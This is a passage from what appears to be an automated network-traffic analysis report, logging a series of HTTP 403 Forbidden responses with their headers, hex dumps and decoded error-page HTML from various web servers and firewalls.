20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:29 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:31 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: bqF3WpuD/V7JdAJTEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I8IM1xYJncZAYPiG0e3l%2BOQSQsDLEW3X9%2BDgcbh4C1hKd%2FdLuz7eFOLmlsxmbYdUcF3FC%2FJRfsZz8EXiQms4uvyR1ptPR%2BtqGmPm%2Fvq5uOuqfSmr9%2Beai%2BUvhYHIMMQB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a886af219960-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zCozaWFjatu7mkbLHZJV%2FBsJO6ot9ebsVxrf4tumBXLZmVEAM7v1zbfFdIs34fehc557BIZaK7XjKMaHSD%2FcOmNOqhOt8r%2BueLgMHsUCCp0fhLUWe0mAfeXD0Zxa5X%2FQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a886df499960-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjII+12BNUOvw3X34fSrjio,m0j2EEknGIVUW/liY8BLLrC01ptYXsMHWXBWBuBw+5rJftmKrOReD3ukbbas4YDoX-Wix-Request-Id: 1678431391.8822011022097320705X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:56 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 